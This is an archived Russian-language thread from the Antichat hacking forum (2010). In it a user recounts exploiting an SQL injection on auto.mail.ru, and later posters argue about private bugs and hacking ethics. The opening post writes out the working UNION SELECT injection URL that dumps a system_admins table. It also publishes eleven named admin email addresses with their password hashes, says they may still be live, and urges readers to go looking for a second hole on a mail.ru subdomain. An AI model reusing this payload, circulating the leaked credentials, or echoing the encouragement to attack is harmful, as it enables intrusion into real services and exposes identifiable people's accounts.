PDA

Просмотр полной версии : SQL на Mail.Ru


satana-fu
09.07.2010, 02:13
Всем доброго времени суток.

Даже не знаю с чего начать, дык тема старая (в привате нигде ее не было, только в моей голове.).

Статью (если ее так можно назвать) написать уговорил Kusto.

Началось все как обычно у меня всегда все начинается, с поиска xss на mail.ru.

Тыкал с кнопки туда сюда, чувствовал себя исследователем и искал. И на один мой тык по адресу


http://auto.mail.ru/view.html?video_id='1

мне вывалилась ошибка в sql.

При помощи Уважаемого мною юзера Античата Nemaniak начали мы ее ковырять.

Итого после долгого брута, sql ошибка вылилась в такой вот запрос


http://auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_pass word)+from+system_admins+limit+0,1+--+

А мы увидели хеш пароля от почты


aizikovich@mail.ru:2e3b8f6d73eb89715150919027e5bf7 1:

Я сперва подумал, что я добрался до базы админских почтовых ящиков и начал выводить все почтовые ящики перебирая лимит вывода +limit+0,1 (спасибо за подсказку Maniak), но скоро радость закончилась, так как вывести я смог только хеши паролей от 11 админских ящиков.

Осозновая свою ничтожность, а так же осозновая что мне нафиг не нужны ни пароли, ни хеши от админских ящиков, я пришел на Античат и спросил местных знатоков, сколько же все таки может стоит данная уязвимость, если ее попытаться продать (учитывая что ни сама уязвимость, ни результат ее реализации мне нафиг не нужны, так как раскручивали только из чистого любопытства, было интересно в денежном эквиваленте - на сколько мы тогда наковыряли)

Создал тему про стоимость sql на популярных почтовых серверах /thread144589.html (https://antichat.live/threads/144589/) и получил ответ от Великого Блэксана (он действительно Великий, просто характер у него такой )


Вообще мы смотрим на вас как на говно ©. Обычная серая масса на ачате и есть школьники


и естественно будучи серой массой (не белой вороной как сейчас), а значит гамном, я далее тему развивать не стал и забыл про эту sql и ее последствия .

На данный момент sql на мейле прикрыта (уже давно), про хеши я думать забыл (пока мне сегодня не напомнили).

Выкладываю и сам sql запрос и выуженные через нее хеши админских паролей.


http://auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_pass word)+from+system_admins+limit+0,1+--+



aizikovich@mail.ru:2e3b8f6d73eb89715150919027e5bf7 1:
marat.kanzafarov@mail.ru:116791431a767fdf932187518 6683b34:
smolyanov@corp.mail.ru:77ef5dc9edd2d4d764399237b3b 59892:
chergik@corp.mail.ru:3e5555700638643f230b98a544f28 7ad:
kabyshev@corp.mail.ru:dffc7be887f428c3f18a60c8a7d8 5a14:
aleksey_kovanov@mail.ru:b11871cb1f75cb38a8a401add0 15734b:
prilutskiy@corp.mail.ru:72b4961d6ed4101abfd0932174 7d45ba:
gagarin@corp.mail.ru:ab41f00cd7aa00e9b679a2d275
nozhkin@corp.mail.ru:a570bf4990157efc9118f7e38d2cd bbe:
rozhkov@corp.mail.ru:2e36b9903435d5da3815d2d298380 f6b:
ysadovnikova@corp.mail.ru:38974963b8b8ea9b2d70c611 5b091f64:

Хеши наверное все еще живые, не брутил их. Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил (по ходу я был далеко не первым ) и забил на них.

Потом была еще одна sql инъекция на mail.ru (на поддомене http://sysadmin.mail.ru/).

Щас даже не помню где именно была дырка, но помню что были удачно выведены пароли от одной партнерки мейла (около 10 000 паролей) и так же удачно забыты вместе с самим sql запросом.

Нигде, даже в логах не сохранились ни пароли, ни сам запрос, поэтому дерзайте, может не закрыли еще .

С уважением, Satana-fu

Kusto
09.07.2010, 02:46
Кстати- упросил его я написать статью, чтобы показать что и у крупных поэктов бывают ошибки- почему была раньше не выложенна статья- думаю понимате , думаю что в ближайшем будующем- будут еще темы, и очень хорошо что этот человек не занимается взломами на заказ- иначеб конкурентов у него небыло бы (я просто знаю его возможности)))

P.S. Подтверждаю что данная уязвимость была на самом деле а не в воображении ТС ( поэтому и выкладываеться сейчас-(спустя пол года после ее прикрытия)- чтоб не нанести вред любимому почтовому сервису)

Romik001
09.07.2010, 03:01
>>почему была раньше не выложенна статья- думаю понимате

эм... вероятно вы просто не сидите нигде кромя как здесь. для меня например это жоский баян! в квекве была тема типа: нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.

YuNi|[c
09.07.2010, 03:02
вообще то на приватах есть такой баг, я видал одну но это или другой не помню. Там тоже были проблемы хешами и поддомене мейла. Тока смысл?!

Не думаю что по своим будем стрелят, все таки не красиво

satana-fu
09.07.2010, 03:22
>>почему была раньше не выложенна статья- думаю понимате
эм... вероятно вы просто не сидите нигде кромя как здесь. для меня например это жоский баян! в квекве была тема типа: нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.


Уважаемый,

1. дата этой уязвимости 20.09.2009, да и вообще этой статьи , почти год прошел с тех пор.

2. Вряд ли вы дернете с мейл.ру sql уязвимостью столько мыл/акков, сколько вам угодно. Не пугайте народ.

3. какая связь между авторегером и админскими хешами ?

4. Гульчатай, откройте личико.

5.


Хеши наверное все еще живые, не брутил их.
Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил(по ходу я был далеко не первым )
и забил на них.


Выделил, то на что Вам стоило обращать внимание.

YuNi|[c
09.07.2010, 03:38
взлом ящиков мейла, спам по мейл агенту, брут мейла и все такое - красиво, а выкладывание уязвимости, которая потеряла свою актуальность, но имела место быть - некрасиво ???


вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.

PS. я против работе по снг, вот буржуев хот .... мне без разницы.

PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)

satana-fu
09.07.2010, 03:42
вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.
PS. я против работе по снг, вот буржуев хот .... мне без разницы.
PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)


Я им уже отправлял однажды.

Спасибо не сказали, даже не ответили , поэтому я делал ради интереса и забывал. Бог свидетель, что на паблик выложил впервые, и то по просьбе. Про эту тоже не вспомнил бы, если не напомнили бы.

Kusto
09.07.2010, 03:44
вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.
PS. я против работе по снг, вот буржуев хот .... мне без разницы.
PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)


Будет Вам и про буржуйские))) но немного попозже))) (там горепрограммеров еще больше чем у нас)))


нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.


вот этим ачат и отличается от квекве, что здесь ВСЕ понимают что те циферки после майла- не пароль а лиш хеш его, и автореггер хешами не замениш

(иногда лучше промолчать, чем дать понять что не в теме-НО, вроде бабушки у подьезда говорили что....) Отличаеш глаголы- я уже СЛЫШАЛ и я НАШОЛ????

M.W.N.N.
09.07.2010, 04:57
5 ветка была? Случаем не осталась структура? Интересует бд в которой лежала таблица system_admins

satana-fu
09.07.2010, 13:31
5 ветка была? Случаем не осталась структура? Интересует бд в которой лежала таблица system_admins



ветка вроде как 4-я, потому что базы вроде как брутом брали,

структура и название бд не сохранилось ни у меня, ни у Maniak.

shell_c0de
09.07.2010, 13:40
а в приватах есть и актуальные скули почти всех почтовиков )

satana-fu
09.07.2010, 13:44
а в приватах есть и актуальные скули почти всех почтовиков )


ну в приватах я даже к своим собственным темам доступа не имею

Romik001
09.07.2010, 17:45
1. дата этой уязвимости 20.09.2009, да и вообще этой статьи , почти год прошел с тех пор. 2. Вряд ли вы дернете с мейл.ру sql уязвимостью столько мыл/акков, сколько вам угодно. Не пугайте народ. 3. какая связь между авторегером и админскими хешами ? 4. Гульчатай, откройте личико.


2. нефакт.

3. никакой. я про хэши ничего не говорил.

просто написал свое имхо. вы же не видели реально че выкладывали. да и вобще меня подобные темы как то мало интересуют.


вот этим ачат и отличается от квекве


а ачат отличается от квекве тем что здесь есть люди которые умудряются толкать "суперприватные баги" за 1000$ о которых знает чуть ли не вся квекве школота. вот это хотел написать давно.

и да:


(иногда лучше промолчать, чем дать понять что не в теме-НО, вроде бабушки у подьезда говорили что....) Отличаеш глаголы- я уже СЛЫШАЛ и я НАШОЛ????


знаешь кусто как бы тебе объяснить? я и не хотел ДАТЬ ПОНЯТЬ что я в "теме". если бы хотел то сделал бы это. надеюсь тебе и таким как ты от этого станет легче на душе.

не в обиду. никого не оскорблял и никому не затыкал рот заметьте.

BrainDeaD
09.07.2010, 23:22
если это раскрытие этой тайны (https://antichat.live/showpost.php/p/2053242/postcount/15/), то Kusto тогда немного преувеличил. А так интересно было почитать.

M_script
10.07.2010, 00:26
Я вообще не понимаю людей, которые ходят по сайтам и пихают кавычки в запросы, а при виде ошибки раскручивают скули по стандартной схеме, чтобы потом выложить их на каком-нибудь форуме. Чем крупнее сайт с найденной узявимостью - тем глубже в приват это все выкладывается и тем выше ЧСВ у нашедшего эту уязвимость. Кто больше кавычек напихал в запросы - становится гуру для других.

Так вот, к чему я это все написал... Romik001, если вся школота на квекве знает какие-то "приватные баги" и дро*ит на них, периодически меряясь, чей баг длиннее, то умные люди рубят на этих багах бабло...

satana-fu
10.07.2010, 01:02
если это раскрытие
этой тайны (https://antichat.live/showpost.php/p/2053242/postcount/15/)
, то Kusto тогда немного преувеличил. А так интересно было почитать.


БрейнДед, зная Кусто, уверен, что он имел ввиду не эту статью годовой давности, которая потеряла свою актуальность и приватом как бэ особо и не является, а совсем другое, которое по сей день актуально и является приватом даже для привата.

Имхо мое личное мнение.

DiamonD21
10.07.2010, 01:10
интересная статья...

Kusto
10.07.2010, 01:30
если это раскрытие
этой тайны (https://antichat.live/showpost.php/p/2053242/postcount/15/)
, то Kusto тогда немного преувеличил. А так интересно было почитать.


К ответу Satana-fu мне добавить нечего))), эта статья родилась на той волне, что не надо стебаться над новичками- иногда они находят интересные баги)), насчет того что я имел ввиду- со временем вы узнаете )),(это действительно приват даже для приватов ), просто бага рабочая и нам бы не хотелось чтоб вы с помощью нее опустили другой популярный сервис)))

Lilo
10.07.2010, 02:01
а ачат отличается от квекве тем что здесь есть люди которые умудряются толкать "суперприватные баги" за 1000$ о которых знает чуть ли не вся квекве школота. вот это хотел написать давно.


мы рады за вас,вы там действительно крутые кулхацкеры.

BrainDeaD
10.07.2010, 03:43
что не надо стебаться над новичками- иногда они находят интересные баги))


+100500. к сожалению на ачате, до недавнего времени, это происходило сплошь и тядом.


насчет того что я имел ввиду- со временем вы узнаете )),(это действительно приват даже для приватов
), просто бага рабочая и нам бы не хотелось чтоб вы с помощью нее опустили другой популярный сервис)))


ждём с нетерпением. интересует не столь сам факт взлома, как история нахождения самой баги. интересно, как находят необычные и супер приватные уязвимости. каков ход мыслей и действий. играет ли роль везение. почему до сих пор специалисты по безопасности и другие хакеы не нашли эту багу. и т.д.

nemaniak
18.07.2010, 00:45
Хорошая статья вышла. Это еще раз говорит о том, что даже на самых популярных и посещаемых ресурсах бывают баги, которые могут быть использованы для получения критической по важности информации. Причем данные дырки не нужно глубоко искать, они есть там, где как раз их никто и не ждет. Может этот факт как раз и оставляет такие баги доступными для юза.

Сколько общаюсь с Satan'ой, всегда удивлялся его таланту вот так просто нарывать такие дырки на таких ресурсах. Кто-то скажет мол типа тут ничего особенного, кавычку всунул, а дальше делов-то. Ну так как раз 80-90% взлома как раз и состоит из процесса поиска дыры, остальное дело техники как говорится. Так что Satan'e респект за проделанную работу